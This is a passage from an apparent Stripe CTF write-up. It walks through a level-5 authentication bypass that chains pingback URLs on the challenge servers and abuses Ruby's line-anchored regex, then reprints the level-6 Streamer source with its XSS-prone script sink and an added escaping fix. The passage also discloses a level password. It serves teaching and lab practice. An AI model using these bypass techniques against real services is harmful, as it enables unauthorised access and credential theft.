There are two steps here: first get authenticated at all, then get authenticated from a host that the server treats as a password host. This is a somewhat hard and nasty challenge. It is also Ruby/Sinatra based.

The application form looks like this:

<a href="http://abiusx.com/blog/wp-content/uploads/2012/08/stripe-ctf-challenge5.png"><img class="aligncenter size-full wp-image-771" title="stripe-ctf-challenge5" src="http://abiusx.com/blog/wp-content/uploads/2012/08/stripe-ctf-challenge5.png" alt="" width="642" height="288" /></a>

You have to provide a pingback URL that, when POSTed the username and password from this form, responds with something like .AUTHENTICATED. (a non-word character in front of the token). The pingback host is accepted only if it ends in stripe-ctf.com (line 21, ALLOWED_HOSTS).

This part is pretty easy: upload another PHP file through Challenge 2&#8242;s upload section that outputs &#8220;.AUTHENTICATED.&#8221; and provide its URL as the pingback. That gets you authenticated, because the regular expression on line 110, <code>/[^\w]AUTHENTICATED[^\w]*$/</code>, requires exactly one non-word character immediately before AUTHENTICATED and then nothing but non-word characters up to the end of a line.

Unfortunately, your host (level02-2.stripe-ctf.com) does not match PASSWORD_HOSTS (<code>/^level05-\d+\.stripe-ctf\.com$/</code>, line 20), so the check on line 57 won&#8217;t show you the password.

So you have to provide a pingback hosted on the level05 server itself, and that server has no upload or file-inclusion flaws. It has nothing apart from the page shown in the picture, so the pingback has to be that page.

Lines 67-70 read the three parameters from Sinatra&#8217;s <code>params</code> hash, which merges query-string and request-body parameters into one hash (the same behaviour as <code>getParameter</code> in Java servlets or <code>$_REQUEST</code> in PHP, and the basis of HTTP parameter pollution). This means we don&#8217;t have to send pingback, username and password as POST parameters: any of them can arrive in the query string instead. So what if the pingback were this:
<blockquote><strong>https://level05-2.stripe-ctf.com/user-ttjzfipuud?pingback=</strong><strong>https://level02-3.stripe-ctf.com/user-shjuxdnipi/uploads/authenticatede.php</strong></blockquote>
What would this do? The outer level05 request POSTs our username and password to this URL, which is level05 itself, with the pingback parameter supplied in the query string. That inner level05 request forwards the credentials to the level02 pingback, which answers .AUTHENTICATED., and the inner level05 reports that back, wrapped in a few words before and after, on a single line:
<blockquote>
<pre>Remote server responded with: .AUTHENTICATED.. Authenticated as username@level02-3.stripe-ctf.com!</pre>
</blockquote>
This is the output of the inner pingback (the level05 server), and it becomes the body that the outer request checks. Unfortunately, it does not pass the regex on line 110: after AUTHENTICATED the pattern allows only non-word characters before the end of a line, and here the words &#8220;Authenticated as &#8230;&#8221; follow on the same line.

This step had me stuck for a couple of hours, until I realised that in Ruby <code>^</code> and <code>$</code> are always line anchors: <code>$</code> matches at the end of every line, not only at the end of the whole string (unlike PHP/PCRE, where you need the <code>m</code> modifier for that; Ruby&#8217;s own <code>/m</code> flag means something else, namely that dot matches newline). So the regex succeeds if any line of the output ends right after AUTHENTICATED. I just had to change the uploaded PHP script to put the token on a line of its own (I used <strong>\rAUTHENTICATED\r</strong> instead of the dots; note that what Ruby&#8217;s <code>$</code> anchors on is a line feed, <code>\n</code>), so that the input to the outer check becomes:
<blockquote>
<pre>Remote server responded with: 
AUTHENTICATED
. Authenticated as username@level02-3.stripe-ctf.com!</pre>
</blockquote>
<div>Now the line that reads AUTHENTICATED ends right after the token, the regex matches, and the outer session is authenticated as a user of level05-2.stripe-ctf.com, which matches PASSWORD_HOSTS, so you get to see the password.</div>
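The chain above, reduced to the pieces that decide it, as an added Ruby example (not part of the original post or of the Stripe CTF code): it reuses the two host regexes and the line-110 check from <code>srv.rb</code>, builds the inner level05 response exactly as the POST handler formats it, and reports which bodies pass. It stands in for Sinatra&#8217;s merged <code>params</code> hash with a plain GET-merged-with-POST hash (Rack&#8217;s behaviour, so no Sinatra is needed), includes a bare carriage-return case because Ruby&#8217;s <code>$</code> anchors only before <code>\n</code>, and ends with a stricter check that the chained body cannot satisfy. The URLs are the ones from this post; the username abx is the one used in this write-up, and the password x and the response bodies are constructed for the example.

```ruby
require 'uri'

# Regexes copied from the production branch of srv.rb (lines 20-21).
PASSWORD_HOSTS = /^level05-\d+\.stripe-ctf\.com$/
ALLOWED_HOSTS  = /\.stripe-ctf\.com$/

# Host extraction exactly as the POST handler does it (lines 71-73).
def pingback_host(pingback)
  pingback = "http://#{pingback}" unless pingback.include?('://')
  URI.parse(pingback).host
end

# The check from line 110: one non-word character before AUTHENTICATED, then
# only non-word characters up to an end of line.  In Ruby, $ matches before
# every "\n" as well as at the end of the string; a bare "\r" is not a line end.
def authenticated?(body)
  !!(body =~ /[^\w]AUTHENTICATED[^\w]*$/)
end

# The body the inner level05 server returns on success.  Lines 88-89 of srv.rb
# concatenate these two strings, so the result is a single line.
def chained_response(inner_body, username, host)
  "Remote server responded with: #{inner_body}." \
    " Authenticated as #{username}@#{host}!"
end

# Stand-in for Sinatra's params hash, which is Rack's GET.merge(POST):
# query-string and form-body parameters land in one hash, body values
# winning on a name clash.  (Simplified for this example; no Sinatra needed.)
def merged_params(query_string, form_body)
  URI.decode_www_form(query_string.to_s).to_h.merge(URI.decode_www_form(form_body.to_s).to_h)
end

# A check that framing text from a wrapper cannot satisfy: the whole body,
# minus surrounding whitespace, has to be the token.
def strict_authenticated?(body)
  body.strip == 'AUTHENTICATED'
end

# Walk the chain and return each decision point (returned rather than printed,
# so the values can be checked).
def walkthrough
  inner = 'https://level02-3.stripe-ctf.com/user-shjuxdnipi/uploads/authenticatede.php'
  outer = "https://level05-2.stripe-ctf.com/user-ttjzfipuud?pingback=#{inner}"

  # The outer level05 POSTs the form's username/password to `outer`; the
  # pingback rides in the query string and is merged in by the inner level05.
  body_sent  = URI.encode_www_form(username: 'abx', password: 'x') # constructed credentials
  params     = merged_params(URI.parse(outer).query, body_sent)
  inner_host = pingback_host(params['pingback'])
  outer_host = pingback_host(outer)

  {
    outer_host_allowed:       !!(outer_host =~ ALLOWED_HOSTS),
    outer_host_gets_password: !!(outer_host =~ PASSWORD_HOSTS),
    inner_host_allowed:       !!(inner_host =~ ALLOWED_HOSTS),
    inner_host_gets_password: !!(inner_host =~ PASSWORD_HOSTS),
    dots_direct:       authenticated?('.AUTHENTICATED.'),
    dots_chained:      authenticated?(chained_response('.AUTHENTICATED.', 'abx', inner_host)),
    cr_chained:        authenticated?(chained_response("\rAUTHENTICATED\r", 'abx', inner_host)),
    lf_chained:        authenticated?(chained_response("\nAUTHENTICATED\n", 'abx', inner_host)),
    strict_lf_direct:  strict_authenticated?("\nAUTHENTICATED\n"),
    strict_lf_chained: strict_authenticated?(chained_response("\nAUTHENTICATED\n", 'abx', inner_host)),
  }
end

if $0 == __FILE__
  walkthrough.each { |name, passed| puts "#{name}: #{passed}" }
end
```

Running the file prints one line per decision: the direct dotted body passes, the same body wrapped by the inner level05 fails, wrapping the token in line feeds makes the chained body pass while a bare carriage return does not, and the strict comparison rejects the chained body altogether. The host checks show why the chain is needed: the level02 host is allowed but not a password host, whereas level05-2 is both.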
<div><!--more--></div>
<h3><strong>Challenge 6 &#8211; XSS with Bypassing</strong></h3>
<div>

You completed this level in 4769.346 seconds. The password was <code>'UomQaKdVQhrI"</code>.

The solution you submitted was:

<code>omfg this took a lot and was soo damn hard <img src='http://abiusx.com/blog/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </code>

<hr />

After Karma Trader from Level 4 was hit with massive karma inflation (purportedly due to someone flooding the market with massive quantities of karma), the site had to close its doors. All hope was not lost, however, since the technology was acquired by a real up-and-comer, Streamer. Streamer is the self-proclaimed most streamlined way of sharing updates with your friends. You can access your Streamer instance here: <strong><a href="https://level06-2.stripe-ctf.com/user-nmqpuylekv" target="_blank">https://level06-2.stripe-ctf.com/user-nmqpuylekv</a></strong>

The Streamer engineers, realizing that security holes had led to the demise of Karma Trader, have greatly beefed up the security of their application. Which is really too bad, because you&#8217;ve learned that the holder of the password to access Level 7, <strong>level07-password-holder</strong>, is the first Streamer user.

As well, <strong>level07-password-holder</strong> is taking a lot of precautions: his or her computer has no network access besides the Streamer server itself, and his or her password is a complicated mess, including quotes and apostrophes and the like.

Fortunately for you, the Streamer engineers have decided to open-source their application so that other people can run their own Streamer instances. You can obtain the source for Streamer at <code>git clone https://level06-2.stripe-ctf.com/user-nmqpuylekv/level06-code</code>. We&#8217;ve also included the most important files below.

The contents of <code>srv.rb</code>:
<table>
<tbody>
<tr>
<td title="double click to toggle">
<pre><a name="n1" href="https://stripe-ctf.com/levels/6#n1"></a>1
<a name="n2" href="https://stripe-ctf.com/levels/6#n2"></a>2
<a name="n3" href="https://stripe-ctf.com/levels/6#n3"></a>3
<a name="n4" href="https://stripe-ctf.com/levels/6#n4"></a>4
<a name="n5" href="https://stripe-ctf.com/levels/6#n5"></a>5
<a name="n6" href="https://stripe-ctf.com/levels/6#n6"></a>6
<a name="n7" href="https://stripe-ctf.com/levels/6#n7"></a>7
<a name="n8" href="https://stripe-ctf.com/levels/6#n8"></a>8
<a name="n9" href="https://stripe-ctf.com/levels/6#n9"></a>9
<strong><a name="n10" href="https://stripe-ctf.com/levels/6#n10"></a>10</strong>
<a name="n11" href="https://stripe-ctf.com/levels/6#n11"></a>11
<a name="n12" href="https://stripe-ctf.com/levels/6#n12"></a>12
<a name="n13" href="https://stripe-ctf.com/levels/6#n13"></a>13
<a name="n14" href="https://stripe-ctf.com/levels/6#n14"></a>14
<a name="n15" href="https://stripe-ctf.com/levels/6#n15"></a>15
<a name="n16" href="https://stripe-ctf.com/levels/6#n16"></a>16
<a name="n17" href="https://stripe-ctf.com/levels/6#n17"></a>17
<a name="n18" href="https://stripe-ctf.com/levels/6#n18"></a>18
<a name="n19" href="https://stripe-ctf.com/levels/6#n19"></a>19
<strong><a name="n20" href="https://stripe-ctf.com/levels/6#n20"></a>20</strong>
<a name="n21" href="https://stripe-ctf.com/levels/6#n21"></a>21
<a name="n22" href="https://stripe-ctf.com/levels/6#n22"></a>22
<a name="n23" href="https://stripe-ctf.com/levels/6#n23"></a>23
<a name="n24" href="https://stripe-ctf.com/levels/6#n24"></a>24
<a name="n25" href="https://stripe-ctf.com/levels/6#n25"></a>25
<a name="n26" href="https://stripe-ctf.com/levels/6#n26"></a>26
<a name="n27" href="https://stripe-ctf.com/levels/6#n27"></a>27
<a name="n28" href="https://stripe-ctf.com/levels/6#n28"></a>28
<a name="n29" href="https://stripe-ctf.com/levels/6#n29"></a>29
<strong><a name="n30" href="https://stripe-ctf.com/levels/6#n30"></a>30</strong>
<a name="n31" href="https://stripe-ctf.com/levels/6#n31"></a>31
<a name="n32" href="https://stripe-ctf.com/levels/6#n32"></a>32
<a name="n33" href="https://stripe-ctf.com/levels/6#n33"></a>33
<a name="n34" href="https://stripe-ctf.com/levels/6#n34"></a>34
<a name="n35" href="https://stripe-ctf.com/levels/6#n35"></a>35
<a name="n36" href="https://stripe-ctf.com/levels/6#n36"></a>36
<a name="n37" href="https://stripe-ctf.com/levels/6#n37"></a>37
<a name="n38" href="https://stripe-ctf.com/levels/6#n38"></a>38
<a name="n39" href="https://stripe-ctf.com/levels/6#n39"></a>39
<strong><a name="n40" href="https://stripe-ctf.com/levels/6#n40"></a>40</strong>
<a name="n41" href="https://stripe-ctf.com/levels/6#n41"></a>41
<a name="n42" href="https://stripe-ctf.com/levels/6#n42"></a>42
<a name="n43" href="https://stripe-ctf.com/levels/6#n43"></a>43
<a name="n44" href="https://stripe-ctf.com/levels/6#n44"></a>44
<a name="n45" href="https://stripe-ctf.com/levels/6#n45"></a>45
<a name="n46" href="https://stripe-ctf.com/levels/6#n46"></a>46
<a name="n47" href="https://stripe-ctf.com/levels/6#n47"></a>47
<a name="n48" href="https://stripe-ctf.com/levels/6#n48"></a>48
<a name="n49" href="https://stripe-ctf.com/levels/6#n49"></a>49
<strong><a name="n50" href="https://stripe-ctf.com/levels/6#n50"></a>50</strong>
<a name="n51" href="https://stripe-ctf.com/levels/6#n51"></a>51
<a name="n52" href="https://stripe-ctf.com/levels/6#n52"></a>52
<a name="n53" href="https://stripe-ctf.com/levels/6#n53"></a>53
<a name="n54" href="https://stripe-ctf.com/levels/6#n54"></a>54
<a name="n55" href="https://stripe-ctf.com/levels/6#n55"></a>55
<a name="n56" href="https://stripe-ctf.com/levels/6#n56"></a>56
<a name="n57" href="https://stripe-ctf.com/levels/6#n57"></a>57
<a name="n58" href="https://stripe-ctf.com/levels/6#n58"></a>58
<a name="n59" href="https://stripe-ctf.com/levels/6#n59"></a>59
<strong><a name="n60" href="https://stripe-ctf.com/levels/6#n60"></a>60</strong>
<a name="n61" href="https://stripe-ctf.com/levels/6#n61"></a>61
<a name="n62" href="https://stripe-ctf.com/levels/6#n62"></a>62
<a name="n63" href="https://stripe-ctf.com/levels/6#n63"></a>63
<a name="n64" href="https://stripe-ctf.com/levels/6#n64"></a>64
<a name="n65" href="https://stripe-ctf.com/levels/6#n65"></a>65
<a name="n66" href="https://stripe-ctf.com/levels/6#n66"></a>66
<a name="n67" href="https://stripe-ctf.com/levels/6#n67"></a>67
<a name="n68" href="https://stripe-ctf.com/levels/6#n68"></a>68
<a name="n69" href="https://stripe-ctf.com/levels/6#n69"></a>69
<strong><a name="n70" href="https://stripe-ctf.com/levels/6#n70"></a>70</strong>
<a name="n71" href="https://stripe-ctf.com/levels/6#n71"></a>71
<a name="n72" href="https://stripe-ctf.com/levels/6#n72"></a>72
<a name="n73" href="https://stripe-ctf.com/levels/6#n73"></a>73
<a name="n74" href="https://stripe-ctf.com/levels/6#n74"></a>74
<a name="n75" href="https://stripe-ctf.com/levels/6#n75"></a>75
<a name="n76" href="https://stripe-ctf.com/levels/6#n76"></a>76
<a name="n77" href="https://stripe-ctf.com/levels/6#n77"></a>77
<a name="n78" href="https://stripe-ctf.com/levels/6#n78"></a>78
<a name="n79" href="https://stripe-ctf.com/levels/6#n79"></a>79
<strong><a name="n80" href="https://stripe-ctf.com/levels/6#n80"></a>80</strong>
<a name="n81" href="https://stripe-ctf.com/levels/6#n81"></a>81
<a name="n82" href="https://stripe-ctf.com/levels/6#n82"></a>82
<a name="n83" href="https://stripe-ctf.com/levels/6#n83"></a>83
<a name="n84" href="https://stripe-ctf.com/levels/6#n84"></a>84
<a name="n85" href="https://stripe-ctf.com/levels/6#n85"></a>85
<a name="n86" href="https://stripe-ctf.com/levels/6#n86"></a>86
<a name="n87" href="https://stripe-ctf.com/levels/6#n87"></a>87
<a name="n88" href="https://stripe-ctf.com/levels/6#n88"></a>88
<a name="n89" href="https://stripe-ctf.com/levels/6#n89"></a>89
<strong><a name="n90" href="https://stripe-ctf.com/levels/6#n90"></a>90</strong>
<a name="n91" href="https://stripe-ctf.com/levels/6#n91"></a>91
<a name="n92" href="https://stripe-ctf.com/levels/6#n92"></a>92
<a name="n93" href="https://stripe-ctf.com/levels/6#n93"></a>93
<a name="n94" href="https://stripe-ctf.com/levels/6#n94"></a>94
<a name="n95" href="https://stripe-ctf.com/levels/6#n95"></a>95
<a name="n96" href="https://stripe-ctf.com/levels/6#n96"></a>96
<a name="n97" href="https://stripe-ctf.com/levels/6#n97"></a>97
<a name="n98" href="https://stripe-ctf.com/levels/6#n98"></a>98
<a name="n99" href="https://stripe-ctf.com/levels/6#n99"></a>99
<strong><a name="n100" href="https://stripe-ctf.com/levels/6#n100"></a>100</strong>
<a name="n101" href="https://stripe-ctf.com/levels/6#n101"></a>101
<a name="n102" href="https://stripe-ctf.com/levels/6#n102"></a>102
<a name="n103" href="https://stripe-ctf.com/levels/6#n103"></a>103
<a name="n104" href="https://stripe-ctf.com/levels/6#n104"></a>104
<a name="n105" href="https://stripe-ctf.com/levels/6#n105"></a>105
<a name="n106" href="https://stripe-ctf.com/levels/6#n106"></a>106
<a name="n107" href="https://stripe-ctf.com/levels/6#n107"></a>107
<a name="n108" href="https://stripe-ctf.com/levels/6#n108"></a>108
<a name="n109" href="https://stripe-ctf.com/levels/6#n109"></a>109
<strong><a name="n110" href="https://stripe-ctf.com/levels/6#n110"></a>110</strong>
<a name="n111" href="https://stripe-ctf.com/levels/6#n111"></a>111
<a name="n112" href="https://stripe-ctf.com/levels/6#n112"></a>112
<a name="n113" href="https://stripe-ctf.com/levels/6#n113"></a>113
<a name="n114" href="https://stripe-ctf.com/levels/6#n114"></a>114
<a name="n115" href="https://stripe-ctf.com/levels/6#n115"></a>115
<a name="n116" href="https://stripe-ctf.com/levels/6#n116"></a>116
<a name="n117" href="https://stripe-ctf.com/levels/6#n117"></a>117
<a name="n118" href="https://stripe-ctf.com/levels/6#n118"></a>118
<a name="n119" href="https://stripe-ctf.com/levels/6#n119"></a>119
<strong><a name="n120" href="https://stripe-ctf.com/levels/6#n120"></a>120</strong>
<a name="n121" href="https://stripe-ctf.com/levels/6#n121"></a>121
<a name="n122" href="https://stripe-ctf.com/levels/6#n122"></a>122
<a name="n123" href="https://stripe-ctf.com/levels/6#n123"></a>123
<a name="n124" href="https://stripe-ctf.com/levels/6#n124"></a>124
<a name="n125" href="https://stripe-ctf.com/levels/6#n125"></a>125
<a name="n126" href="https://stripe-ctf.com/levels/6#n126"></a>126
<a name="n127" href="https://stripe-ctf.com/levels/6#n127"></a>127
<a name="n128" href="https://stripe-ctf.com/levels/6#n128"></a>128
<a name="n129" href="https://stripe-ctf.com/levels/6#n129"></a>129
<strong><a name="n130" href="https://stripe-ctf.com/levels/6#n130"></a>130</strong>
<a name="n131" href="https://stripe-ctf.com/levels/6#n131"></a>131
<a name="n132" href="https://stripe-ctf.com/levels/6#n132"></a>132
<a name="n133" href="https://stripe-ctf.com/levels/6#n133"></a>133
<a name="n134" href="https://stripe-ctf.com/levels/6#n134"></a>134
<a name="n135" href="https://stripe-ctf.com/levels/6#n135"></a>135
<a name="n136" href="https://stripe-ctf.com/levels/6#n136"></a>136
<a name="n137" href="https://stripe-ctf.com/levels/6#n137"></a>137
<a name="n138" href="https://stripe-ctf.com/levels/6#n138"></a>138
<a name="n139" href="https://stripe-ctf.com/levels/6#n139"></a>139
<strong><a name="n140" href="https://stripe-ctf.com/levels/6#n140"></a>140</strong>
<a name="n141" href="https://stripe-ctf.com/levels/6#n141"></a>141
<a name="n142" href="https://stripe-ctf.com/levels/6#n142"></a>142
<a name="n143" href="https://stripe-ctf.com/levels/6#n143"></a>143
<a name="n144" href="https://stripe-ctf.com/levels/6#n144"></a>144
<a name="n145" href="https://stripe-ctf.com/levels/6#n145"></a>145
<a name="n146" href="https://stripe-ctf.com/levels/6#n146"></a>146
<a name="n147" href="https://stripe-ctf.com/levels/6#n147"></a>147
<a name="n148" href="https://stripe-ctf.com/levels/6#n148"></a>148
<a name="n149" href="https://stripe-ctf.com/levels/6#n149"></a>149
<strong><a name="n150" href="https://stripe-ctf.com/levels/6#n150"></a>150</strong>
<a name="n151" href="https://stripe-ctf.com/levels/6#n151"></a>151
<a name="n152" href="https://stripe-ctf.com/levels/6#n152"></a>152
<a name="n153" href="https://stripe-ctf.com/levels/6#n153"></a>153
<a name="n154" href="https://stripe-ctf.com/levels/6#n154"></a>154
<a name="n155" href="https://stripe-ctf.com/levels/6#n155"></a>155
<a name="n156" href="https://stripe-ctf.com/levels/6#n156"></a>156
<a name="n157" href="https://stripe-ctf.com/levels/6#n157"></a>157
<a name="n158" href="https://stripe-ctf.com/levels/6#n158"></a>158
<a name="n159" href="https://stripe-ctf.com/levels/6#n159"></a>159
<strong><a name="n160" href="https://stripe-ctf.com/levels/6#n160"></a>160</strong>
<a name="n161" href="https://stripe-ctf.com/levels/6#n161"></a>161
</pre>
</td>
<td>
<pre>#!/usr/bin/env ruby
require 'rubygems'
require 'bundler/setup'

require 'rack/utils'
require 'rack/csrf'
require 'json'
require 'sequel'
require 'sinatra'

module Streamer
  PASSWORD = File.read('password.txt').strip

  # Only needed in production
  URL_ROOT = File.read('url_root.txt').strip rescue ''

  module DB
    def self.db_file
      'streamer.db'
    end

    def self.conn
      @conn ||= Sequel.sqlite(db_file)
    end

    def self.safe_insert(table, key_values)
      key_values.each do |key, value|
        # Just in case people try to exfiltrate
        # level07-password-holder's password
        if value.kind_of?(String) &amp;&amp;
            (value.include?('"') || value.include?("'"))
          raise "Value has unsafe characters"
        end
      end

      conn[table].insert(key_values)
    end

    def self.init
      return if File.exists?(db_file)
      File.umask(0066)

      conn.create_table(:users) do
        primary_key :id
        String :username
        String :password
        Time :last_active
      end

      conn.create_table(:posts) do
        primary_id :id
        String :user
        String :title
        String :body
        Time :time
      end

      conn[:users].insert(:username =&gt; 'level07-password-holder',
        :password =&gt; Streamer::PASSWORD,
        :last_active =&gt; Time.now.utc)

      conn[:posts].insert(:user =&gt; 'level07-password-holder',
        :title =&gt; 'Hello World',
        :body =&gt; "Welcome to Streamer, the most streamlined way of sharing
updates with your friends!

One great feature of Streamer is that no password resets are needed. I, for
example, have a very complicated password (including apostrophes, quotes, you
name it!). But I remember it by clicking my name on the right-hand side and
seeing what my password is.

Note also that Streamer can run entirely within your corporate firewall. My
machine, for example, can only talk directly to the Streamer server itself!",
        :time =&gt; Time.now.utc)
    end
  end

  class StreamerSrv &lt; Sinatra::Base
    set :environment, :production
    enable :sessions

    # Use persistent entropy file
    entropy_file = 'entropy.dat'
    unless File.exists?(entropy_file)
      File.open(entropy_file, 'w') do |f|
        f.write(OpenSSL::Random.random_bytes(24))
      end
    end
    set :session_secret, File.read(entropy_file)

    use Rack::Csrf, :raise =&gt; true

    helpers do
      def absolute_url(path)
        Streamer::URL_ROOT + path
      end

      # Insert an hidden tag with the anti-CSRF token into your forms.
      def csrf_tag
        Rack::Csrf.csrf_tag(env)
      end

      # Return the anti-CSRF token
      def csrf_token
        Rack::Csrf.csrf_token(env)
      end

      # Return the field name which will be looked for in the requests.
      def csrf_field
        Rack::Csrf.csrf_field
      end

      include Rack::Utils
      alias_method :h, :escape_html
    end

    def redirect(url)
      super(absolute_url(url))
    end

    before do
      @user = logged_in_user
      update_last_active
    end

    def logged_in_user
      if session[:user]
        @username = session[:user]
        @user = DB.conn[:users][:username =&gt; @username]
      end
    end

    def update_last_active
      return unless @user
      DB.conn[:users].where(:username =&gt; @user[:username]).
        update(:last_active =&gt; Time.now.utc)
    end

    def recent_posts
      # Grab the 5 most recent posts
      DB.conn[:posts].reverse_order(:time).limit(5).to_a.reverse
    end

    def registered_users
      DB.conn[:users].reverse_order(:id)
    end

    def die(msg, view)
      @error = msg
      halt(erb(view))
    end

    get '/' do
      if @user
        @registered_users = registered_users
        @posts = recent_posts

        erb :home
      else
        erb :login
      end
    end

    get '/register' do
      erb :register
    end

    post '/register' do
      username = params[:username]
      password = params[:password]
      unless username &amp;&amp; password
        die("Please specify both a username and a password.", :register)
      end

      unless DB.conn[:users].where(:username =&gt; username).count == 0
        die("This username is already registered. Try another one.",
            :register)
      end

      DB.safe_insert(:users,
        :username =&gt; username,
        :password =&gt; password,
        :last_active =&gt; Time.now.utc
        )
      session[:user] = username
      redirect '/'
    end

    get '/login' do
      redirect '/'
    end

    post '/login' do
      username = params[:username]
      password = params[:password]
      user = DB.conn[:users][:username =&gt; username, :password =&gt; password]
      unless user
        die('Could not authenticate. Perhaps you meant to register a new' \
            ' account? (See link below.)', :login)
      end

      session[:user] = user[:username]
      redirect '/'
    end

    get '/logout' do
      session.clear
      redirect '/'
    end

    get '/user_info' do
      @password = @user[:password]

      erb :user_info
    end

    before '/ajax/*' do
      halt(403, 'Must be logged in!') unless @user
    end

    get '/ajax/posts' do
      recent_posts.to_json
    end

    post '/ajax/posts' do
      msg = create_post
      resp = {:response =&gt; msg}
      resp.to_json
    end

    # Fallback if JS breaks
    get '/posts' do
      redirect '/'
    end

    post '/posts' do
      create_post if @user
      redirect '/'
    end

    def create_post
      post_body = params[:body]
      title = params[:title] || 'untitled'
      if post_body
        DB.safe_insert(:posts,
          :user =&gt; @user[:username],
          :title =&gt; title,
          :body =&gt; post_body,
          :time =&gt; Time.now.utc
          )
        'Successfully added the post!'
      else
        'No post body given!'
      end
    end
  end
end

def main
  Streamer::DB.init
  Streamer::StreamerSrv.run!
end

if $0 == __FILE__
  main
  exit(0)
end</pre>
</td>
</tr>
</tbody>
</table>
The contents of <code>views/home.erb</code>:
<table>
<tbody>
<tr>
<td>
<pre>&lt;div class='row'&gt;
  &lt;div class='span9'&gt;
    &lt;h3&gt;Stream of Posts&lt;/h3&gt;

    &lt;table id='posts' class='table table-bordered table-condensed'&gt;
      &lt;tbody&gt;
      &lt;/tbody&gt;
    &lt;/table&gt;

    &lt;script&gt;
      var username = "&lt;%= @username %&gt;";
      var post_data = &lt;%= @posts.to_json %&gt;;

      function escapeHTML(val) {
        return $('&lt;div/&gt;').text(val).html();
      }
      function addPost(item) {
        var new_element = '&lt;tr&gt;&lt;th&gt;' + escapeHTML(item['user']) +
            '&lt;/th&gt;&lt;td&gt;&lt;h4&gt;' + escapeHTML(item['title']) + '&lt;/h4&gt;' +
            escapeHTML(item['body']) + '&lt;/td&gt;&lt;/tr&gt;';
        $('#posts &gt; tbody:last').prepend(new_element);
      }

      for(var i = 0; i &lt; post_data.length; i++) {
        var item = post_data[i];
        addPost(item);
      };
    &lt;/script&gt;

    &lt;form id='new_post' name='new_post' action='&lt;%= absolute_url("/posts") %&gt;'
          method='POST'&gt;
      &lt;%= csrf_tag %&gt;
      &lt;fieldset&gt;
        &lt;div class='control-group'&gt;
          &lt;label class='control-label' for='title'&gt;Title:&lt;/label&gt;
          &lt;div class='controls'&gt;
            &lt;input class='input-medium' name='title' id='title' type='text'/&gt;
          &lt;/div&gt;
        &lt;/div&gt;
        &lt;div class='control-group'&gt;
          &lt;label class='control-label' for='content'&gt;Content:&lt;/label&gt;
          &lt;div class='controls'&gt;
            &lt;textarea class='input-xlarge' name='body' id='content'
              type='text'&gt;Your post here...&lt;/textarea&gt;
          &lt;/div&gt;
        &lt;/div&gt;
        &lt;div class='form-actions'&gt;
          &lt;input class='btn btn-primary' type='submit' value='Post'/&gt;
        &lt;/div&gt;
        &lt;div id='status' name='status' class="alert alert-info"&gt;
          Ready and waiting!
        &lt;/div&gt;
      &lt;/fieldset&gt;
    &lt;/form&gt;

    &lt;script&gt;
      $(document).ready(function() {
        $('#new_post').submit(function(e) {
          var new_post_data = {
            title: $("#title").val(),
            body: $("#content").val(),
            &lt;%= csrf_field %&gt;: "&lt;%= csrf_token %&gt;"
          };
          $.post('&lt;%= absolute_url("/ajax/posts") %&gt;',
                 new_post_data,
                 function(data) {
            var status_text = $.parseJSON(data);
            $('#status').html(status_text['response']);

            new_post_data['user'] = username;
            addPost(new_post_data);
          });

          e.preventDefault();
          return false;
        });
      });
    &lt;/script&gt;
  &lt;/div&gt;
  &lt;div class='span3'&gt;
    &lt;h3&gt;Users Online&lt;/h3&gt;
    &lt;table class='table table-condensed'&gt;
      &lt;% @registered_users.each do |user| %&gt;
        &lt;tr&gt;
          &lt;td&gt;
            &lt;% if @username == user[:username] %&gt;
              &lt;em&gt;
                &lt;a href='&lt;%= absolute_url("/user_info") %&gt;' target='_blank'&gt;
                  &lt;%=h user[:username] %&gt; (me)
                &lt;/a&gt;
              &lt;/em&gt;
            &lt;% else %&gt;
              &lt;%=h user[:username] %&gt;
            &lt;% end %&gt;

            &lt;br /&gt;

            &lt;span style="font-size:10px"&gt;
              Last active: &lt;%= user[:last_active].strftime('%H:%M:%S UTC') %&gt;
            &lt;/span&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
      &lt;% end %&gt;
    &lt;/table&gt;
  &lt;/div&gt;
&lt;/div&gt;</pre>
</td>
</tr>
</tbody>
</table>
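The sink to notice in <code>home.erb</code> is <code>var post_data = &lt;%= @posts.to_json %&gt;;</code>: the JSON is dropped into a <code>&lt;script&gt;</code> element with no HTML-context escaping, and the only server-side filter, <code>DB.safe_insert</code>, rejects nothing but quote characters. The Ruby below is an added example, not part of the Stripe CTF source or this post; it mirrors the quote filter, shows that a quote-free body still contains a script-terminating sequence once serialised, and gives the defensive fix: emit JSON with <code>&lt;</code>, <code>&gt;</code>, <code>&amp;</code> and the U+2028/U+2029 line terminators as <code>\uXXXX</code> escapes so the literal stays valid JSON but can never close the element. The module and function names (<code>StreamerHardening</code>, <code>json_for_script</code>) and the sample post are constructed for this illustration.

```ruby
require 'json'

# Added example (not Streamer's own code): the quote filter from srv.rb
# beside a script-safe JSON encoder for the two inline assignments in home.erb.
module StreamerHardening
  # Mirrors the check in Streamer::DB.safe_insert: only ' and " are rejected.
  def self.quote_filter_accepts?(value)
    return true unless value.kind_of?(String)
    !(value.include?('"') || value.include?("'"))
  end

  # Characters an HTML parser treats specially inside <script>, and the
  # \uXXXX escapes that mean the same thing to a JSON/JS parser.
  # (Single-quoted Ruby strings keep the backslash literally.)
  SCRIPT_UNSAFE = {
    '<'      => '\u003c',
    '>'      => '\u003e',
    '&'      => '\u0026',
    "\u2028" => '\u2028',
    "\u2029" => '\u2029',
  }.freeze

  # JSON.generate output with the characters above re-encoded. The result
  # parses back to the same object but contains no '<', so "</script" can
  # never appear in it regardless of what a user stored in a post or username.
  def self.json_for_script(obj)
    JSON.generate(obj).gsub(/[<>&\u2028\u2029]/) { |c| SCRIPT_UNSAFE[c] }
  end

  # True if the rendered text contains the sequence that ends script data
  # for the HTML tokenizer ("</script", case-insensitive).
  def self.breaks_out_of_script?(rendered)
    !!(rendered =~ /<\/script/i)
  end

  # The hardened form of home.erb's two assignments. A JSON string literal is
  # a valid JavaScript string literal, so the username is embedded the same
  # way instead of being pasted between bare double quotes.
  def self.render_post_script(username, posts)
    "var username = #{json_for_script(username)};\n" \
    "var post_data = #{json_for_script(posts)};\n"
  end
end

if $0 == __FILE__
  # Constructed sample post: passes the quote filter, yet plain to_json would
  # place a literal </script> inside the script element.
  sample = [{ 'user' => 'alice', 'title' => 'hi', 'body' => 'x </script> y' }]
  puts StreamerHardening.render_post_script('alice', sample)
end
```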
The contents of <code>views/login.erb</code>:
<table>
<tbody>
<tr>
<td>
<pre>&lt;div class='row'&gt;
  &lt;div class='span12'&gt;
